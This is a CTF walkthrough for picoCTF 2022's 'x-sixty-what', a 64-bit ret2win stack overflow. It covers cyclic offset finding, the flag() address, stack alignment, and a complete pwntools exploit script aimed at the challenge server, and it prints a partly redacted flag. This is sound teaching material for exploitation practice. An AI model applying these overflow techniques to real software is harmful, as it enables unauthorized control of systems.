Description

A 64-bit buffer overflow with no stack canary. Overflow the stack buffer to control RIP (the 64-bit instruction pointer) and redirect execution to a flag-printing function.

Key difference from 32-bit: 64-bit binaries use registers (RDI, RSI, RDX...) for the first six arguments, and RIP is 8 bytes wide - addresses must be packed with p64().

Setup

Download vuln

Download the binary and make it executable.

Check security mitigations with checksec.

Use pwntools to find the offset and the address of the flag function.

bash

wget https://artifacts.picoctf.net/c/192/vuln && chmod +x vuln

bash

checksec --file=vuln

bash

objdump -d vuln | grep '<flag>'

Solution

For a step-by-step walkthrough of stack overflows, ret2win, and ROP scaffolding (cyclic offset, p64 packing, alignment), see the Buffer Overflow Binary Exploitation guide.

Step 1
Identify the offset to RIP (it is 72)
Observation
I noticed the binary has no stack canary (confirmed by checksec) and reads input with gets(), which suggested a classic stack buffer overflow where a cyclic pattern could pinpoint exactly how many bytes reach the saved return address.
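Generate a cyclic pattern with 8-byte unique windows, crash the binary, and read the qword at RSP rather than RIP: the faulting ret never loads the pattern into RIP, so the overwritten return address is still sitting at the top of the stack. With this binary, the answer is 72.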
bash
# Pipe a cyclic pattern (8-byte unique windows) in to crash the binary:
cyclic -n 8 200 | ./vuln
# In GDB, repeat the run and read the value at the top of the stack at the crash:
gdb -q ./vuln -ex 'r <<< $(cyclic -n 8 200)' -ex 'x/gx $rsp'
# Translate the leaked qword back to the offset:
python3 -c "from pwn import cyclic_find; print(cyclic_find(0x616161616161616a, n=8))"
# -> 72
What didn't work first
Tried: Reading RIP instead of RSP after the crash to find the cyclic offset
In 64-bit, a ret to a non-canonical address triggers a #GP fault before RIP is updated, so the debugger shows RIP pointing at the ret instruction itself, not at your pattern. RSP holds the top-of-stack value that ret was about to pop, which is where the cyclic bytes land. Always read $rsp at the crash site to get the overwritten saved-rip value.
Tried: Running cyclic_find without the n=8 keyword argument
pwntools cyclic defaults to 4-byte unique substrings (n=4). The generator and the lookup must agree on n: a qword taken from an n=4 pattern is not found by cyclic_find(..., n=8), which returns -1, and a qword from an n=8 pattern looked up with the default n=4 can produce a wrong offset. Pass n=8 to both cyclic() and cyclic_find() (or cyclic -n 8 on the command line) so the pattern is built from unique 8-byte substrings matching what x86-64 pops.
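The first pitfall above depends on whether the overwritten return address is canonical. As a minimal sketch, assuming ordinary 48-bit virtual addressing (4-level paging) and using a hypothetical helper name, the check the CPU performs can be written as:

```python
def is_canonical(addr: int) -> bool:
    """Return True if a 64-bit address is canonical under 48-bit addressing.

    Assumption: 4-level paging, so bits 48..63 must all copy bit 47.
    """
    top = (addr & 0xFFFFFFFFFFFFFFFF) >> 47   # bits 47..63, 17 bits in total
    return top == 0 or top == 0x1FFFF          # all clear or all set


# A typical non-PIE code address is canonical; ASCII pattern bytes are not.
print(is_canonical(0x00000000004011D6))
print(is_canonical(0x616161616161616A))
```

Because a qword of lowercase ASCII always has non-zero upper bits, a cyclic pattern in the return slot faults at the ret itself, which is why the pattern shows up at $rsp and not in RIP.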
Learn more
x86-64 calling convention (System V AMD64 ABI). The first six integer/pointer arguments go in registers in this order: rdi, rsi, rdx, rcx, r8, r9. Floating-point args go in xmm0..xmm7. Additional args go on the stack. Return value comes back in rax. The stack must be 16-byte aligned at the moment of call.
Stack at vuln() ret on x86-64:
high addr +--------------+
          | saved rip    | <- 8 bytes, payload[72:80] -> &flag()
          +--------------+
          | saved rbp    | <- 8 bytes, payload[64:72]
          +--------------+
          | char buf[64] | <- payload[0:64] = "AAAA..."
low addr  +--------------+ <- rsp at gets()
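The layout in the diagram can be checked with a few lines of arithmetic. This is a sketch only: the target address is a placeholder, build_payload is a hypothetical helper, and struct.pack stands in for pwntools' p64().

```python
import struct

BUF_SIZE = 64                      # char buf[64] from the diagram
SAVED_RBP_SIZE = 8                 # saved rbp slot directly above the buffer
OFFSET = BUF_SIZE + SAVED_RBP_SIZE # bytes needed to reach the saved rip

PLACEHOLDER_TARGET = 0x401234      # placeholder, not the real flag() address


def build_payload(target: int) -> bytes:
    """Fill the buffer and saved rbp, then overwrite the saved rip."""
    payload = b"A" * BUF_SIZE              # payload[0:64]
    payload += b"B" * SAVED_RBP_SIZE       # payload[64:72]
    payload += struct.pack("<Q", target)   # payload[72:80], little-endian
    return payload


payload = build_payload(PLACEHOLDER_TARGET)
print(OFFSET, len(payload), payload[72:80].hex())
```

Using a different filler byte for the saved rbp slot makes it easy to tell the two regions apart in a debugger.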
Why crash diagnostics differ from 32-bit. When ret tries to pop a non-canonical address (bits 48-63 must equal bit 47, otherwise the CPU raises #GP), the fault fires before rip is updated. You will see RIP pointing at the ret instruction, not at your pattern. Read $rsp instead to recover the cyclic bytes:
(gdb) x/gx $rsp
0x7fffffffe018: 0x616161616161616a <- this 8-byte value is your pattern ("jaaaaaaa")
(gdb) shell python3 -c "from pwn import *; print(cyclic_find(0x616161616161616a, n=8))"
72
The n=8 matters: pwntools' default cyclic uses 4-byte unique substrings, and cyclic_find must be given the same n that generated the pattern. For 64-bit, generate with cyclic(200, n=8) and look up with cyclic_find(..., n=8).
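To make the role of n concrete, here is a standard-library sketch of a de Bruijn pattern generator and offset lookup. It is not pwntools' code; make_pattern and find_offset are hypothetical names, and the lowercase alphabet is an assumption chosen to resemble pwntools' default.

```python
import struct
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a de Bruijn sequence: every n-byte window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def make_pattern(length: int, n: int = 8) -> bytes:
    """Take the first `length` bytes of the sequence over a-z."""
    return bytes(islice(de_bruijn(ascii_lowercase.encode(), n), length))


def find_offset(leaked_qword: int, pattern: bytes) -> int:
    """Return the offset of a little-endian qword in the pattern, or -1."""
    return pattern.find(struct.pack("<Q", leaked_qword))


pattern = make_pattern(200, n=8)
# Simulate the qword that x/gx $rsp would show if the saved rip sits at offset 72.
leaked = struct.unpack("<Q", pattern[72:80])[0]
print(hex(leaked), find_offset(leaked, pattern))
```

The lookup is only a byte search for the little-endian form of the leaked value, which is why the pattern must have been generated with the same window size that is searched for.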
Step 2
Find the flag() function address
Observation
I noticed checksec reported No PIE on the binary, which suggested the flag() function would sit at a fixed virtual address on every run and could be read directly from objdump output without any leak or calculation.
Use objdump or pwntools ELF to locate flag(). Because the binary has no PIE, the address is fixed each run. The objdump line is also a sanity check that the function exists where you expect it.
bash
# Confirm the flag() function exists and note its address:
objdump -d vuln | grep '<flag>:'
# -> 00000000004011d6 <flag>:
python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.symbols['flag']))"
Expected output
```
00000000004011d6 <flag>:
0x4011d6
```
What didn't work first
Tried: Using nm -D vuln to look up the flag() address from dynamic symbols
nm -D only prints the dynamic symbol table (.dynsym), which holds just the symbols involved in runtime linking. flag() is defined inside the executable and is not exported for dynamic linking, so it appears only in the static symbol table (.symtab). Use objdump -d or nm (without -D) to reach static symbols, or use pwntools ELF, which reads .symtab directly.
Tried: Assuming the flag() address stays the same between local and remote runs when PIE is disabled
With no PIE, the executable's own segments (.text, .data, .bss) load at their link-time addresses on every run, so the flag() address from objdump is correct for the remote as long as the server runs the same binary you downloaded. Kernel ASLR still randomizes the stack, heap, and shared libraries, but none of those matter for this payload. Confirm that checksec reports No PIE before trusting a hardcoded address.
Learn more
Without PIE (Position-Independent Executable), the binary is loaded at a fixed base address every time. checksec shows "No PIE" if this is the case. This means the virtual address of flag() in objdump output is exactly what you write into the payload - no calculation needed.
With PIE enabled, the binary would be loaded at a random base address (ASLR for executables), and you would first need to leak an address from the binary to calculate the actual load address before computing flag()'s runtime address.
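For contrast, the calculation a PIE build would require can be sketched as follows. Every number here is made up for illustration, and runtime_address is a hypothetical helper; none of it is needed for this challenge.

```python
def runtime_address(leaked_addr: int, leaked_sym_offset: int,
                    target_sym_offset: int) -> int:
    """Derive a symbol's runtime address from one leaked address in the same binary."""
    base = leaked_addr - leaked_sym_offset
    if base & 0xFFF:
        raise ValueError("computed base is not page-aligned; wrong leak or offset")
    return base + target_sym_offset


# Hypothetical values: a leaked pointer to main and file offsets read from objdump.
LEAKED_MAIN = 0x55D0C7E4B2F0
MAIN_OFFSET = 0x12F0
FLAG_OFFSET = 0x11D6

print(hex(runtime_address(LEAKED_MAIN, MAIN_OFFSET, FLAG_OFFSET)))
```

The page-alignment check is a cheap sanity test: a load base that does not end in three zero hex digits usually means the leak was attributed to the wrong symbol.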
Step 3
Build the 64-bit exploit, landing at flag() + 5
Observation
I noticed that returning straight to flag() crashed with SIGSEGV even though the offset and address were right, and that the disassembly of flag() begins with endbr64 followed by push rbp, which suggested a stack-alignment problem that landing at flag() + 5 (past both instructions) would avoid.
Pad 72 bytes, then jump to flag() + 5 (past endbr64 and push rbp). Returning to the very start of flag() does transfer control, but it leaves the stack misaligned: after the hijacked ret, RSP is a multiple of 16 on entry, whereas a normal call would leave it 8 bytes off, so push rbp moves it to 8 mod 16 and the libc routines that flag() calls can fault on aligned SSE instructions such as movaps. Skipping 5 bytes lands on mov rbp,rsp, so the push never happens, RSP stays 16-byte aligned, and the function runs far enough to print the flag. endbr64 itself is harmless here: Intel CET's indirect branch tracking checks only indirect call and jmp targets, not ret.
python
from pwn import *

elf = ELF('./vuln')

# flag() starts with endbr64 (4 bytes) + push rbp (1 byte).
# Skipping both keeps RSP 16-byte aligned inside flag().
flag_addr = elf.symbols['flag'] + 5

payload = b'A' * 72          # offset to the saved RIP
payload += p64(flag_addr)    # land on mov rbp,rsp inside flag()

p = remote('saturn.picoctf.net', <PORT_FROM_INSTANCE>)
p.sendline(payload)          # gets() consumes this line as its input
print(p.recvall().decode())
What didn't work first
Tried: Jumping directly to elf.symbols['flag'] (the endbr64 instruction) instead of flag() + 5
Control does reach flag(), but the process dies with SIGSEGV before the flag is printed. The cause is stack alignment, not endbr64: entering through ret instead of call leaves RSP 8 bytes off from what the function expects, and after push rbp the stack is misaligned for the libc calls that follow. Landing on mov rbp,rsp at flag() + 5 skips the push and keeps RSP 16-byte aligned. Placing the address of a lone ret gadget before the address of flag() fixes the alignment equally well.
Tried: Using p32() to pack the flag() address into the payload
p32() packs a value as 4 bytes in little-endian order, which is correct for 32-bit x86 exploits where saved-eip is 4 bytes wide. On x86-64, the saved-rip slot is 8 bytes wide and the full 64-bit address must be packed with p64(). Using p32() writes only the low 4 bytes and leaves the upper 4 bytes of the slot untouched, so the final address depends on whatever was already there and can fault on ret.
Learn more
What is endbr64? endbr64 (opcode F3 0F 1E FA, 4 bytes) is the marker that Intel CET (Control-flow Enforcement Technology) indirect branch tracking (IBT) places at the top of every indirectly-callable function. With IBT active, an indirect branch (call *rax, jmp *rax) must land on endbr64, otherwise the CPU raises a #CP (Control Protection) fault. IBT does not check ret; returns are covered by CET's separate shadow-stack feature. Where IBT is not enabled, endbr64 executes as a NOP. A buffer-overflow ret that lands on endbr64 is therefore not what kills this exploit; the instruction matters here only because its 4 bytes are part of the distance to skip.
Why +5 works. The standard function prologue looks like: endbr64 (4 bytes) followed by push rbp (1 byte) followed by mov rbp,rsp. The ABI expects RSP to be 16-byte aligned at every call, so a function entered by call starts with RSP at 8 mod 16 and its push rbp restores alignment. After the hijacked ret, RSP is already 0 mod 16 when flag() begins, so executing push rbp would misalign it for every libc call inside flag(). Jumping to flag() + 5 skips the push and lands directly on mov rbp,rsp, leaving RSP aligned. RBP is still set from RSP at that point, so the frame works and the function gets as far as opening and printing the flag file. The process may still crash when flag() returns, because leave and ret then pop bytes that were never a valid frame, but by then the flag is out.
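One way to see the effect of skipping push rbp is to track RSP modulo 16 from function entry to the first call in the body. The model below is a simplified sketch: it assumes the caller was correctly aligned and that the compiler's sub rsp adjustment is a multiple of 16, and the function name is hypothetical.

```python
def rsp_mod16_at_first_call(entered_via: str, skip_push: bool) -> int:
    """Return RSP mod 16 at the first call inside a function.

    entered_via: "call" for a normal call, "ret" for a hijacked return.
    skip_push:   True when execution starts after `push rbp`.
    """
    # Before a normal call RSP is 16-byte aligned; the call pushes 8 bytes.
    # A hijacked ret pops the 8-byte return slot instead, so RSP is back at
    # a multiple of 16 on entry.
    rsp = {"call": 8, "ret": 0}[entered_via]
    if not skip_push:
        rsp = (rsp - 8) % 16   # push rbp moves RSP down by 8
    # Assumption: any `sub rsp, N` uses N divisible by 16, so it is ignored.
    return rsp


for entry, skip in (("call", False), ("ret", False), ("ret", True)):
    print(entry, skip, rsp_mod16_at_first_call(entry, skip))
```

A result of 0 means aligned SSE stores inside libc are safe; a result of 8 is the state that leads to the crash when returning to the first byte of the function.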
Finding the safe address. Disassemble flag() with objdump -d vuln | grep -A 5 '<flag>:' to see the exact byte layout for this build. The address you want is the one labeled mov rbp,rsp. Alternatively, compute it as elf.symbols['flag'] + 5 in pwntools, which gives the same address directly.
p64(addr) packs a 64-bit address as 8 bytes in little-endian order, which is what x86-64 stores on the stack. This is the 64-bit counterpart of p32() used in 32-bit exploits.
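For readers without pwntools at hand, the same packing can be reproduced with the standard library. This is a sketch: pack64 and pack32 are hypothetical stand-ins for p64() and p32(), and the address is a placeholder.

```python
import struct


def pack64(value: int) -> bytes:
    """Little-endian 8-byte encoding, the stand-in for p64()."""
    return struct.pack("<Q", value)


def pack32(value: int) -> bytes:
    """Little-endian 4-byte encoding, the stand-in for p32()."""
    return struct.pack("<I", value)


addr = 0x401234                       # placeholder address
packed = pack64(addr)
print(packed.hex(), len(packed))      # fills the whole 8-byte return slot
print(pack32(addr).hex(), len(pack32(addr)))  # only 4 bytes: half the slot
print(hex(struct.unpack("<Q", packed)[0]))    # round trip back to the integer
```

The least significant byte comes first in memory, which is why the hex dump of the payload looks reversed compared with the address printed by objdump.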

Interactive tools

Cyclic Pattern Generator: Generate de Bruijn cyclic patterns and find buffer overflow offsets. The browser equivalent of pwntools cyclic and cyclic_find.
pwntools Payload Builder: Pack integers into little-endian bytes (p32 / p64), unpack bytes back to integers, and build flat ROP payloads with offset-based insertion.

Flag

picoCTF{b1663r_15_b3773r_3...}

Overflow 72 bytes to RIP, then jump to flag()+5 (past endbr64 and push rbp) so the stack stays 16-byte aligned inside flag(). Pack the 64-bit address with p64().

Key takeaway

Stack buffer overflows in 64-bit binaries follow the same principle as 32-bit: fill the buffer, overwrite the saved return address, and redirect execution. The key differences are that addresses are 8 bytes wide (packed with p64 in little-endian), the calling convention passes arguments in registers rather than on the stack, and the 16-byte stack alignment rule means a hijacked ret may need to land past push rbp (here flag() + 5) or pass through an extra ret gadget first. The same ret2win pattern scales up to full ROP chains once no-execute protections are added.

x-sixty-what picoCTF 2022 Solution

What to try next

buffer overflow 1

buffer overflow 2

buffer overflow 0

Guessing Game 1

handoff

offset-cycle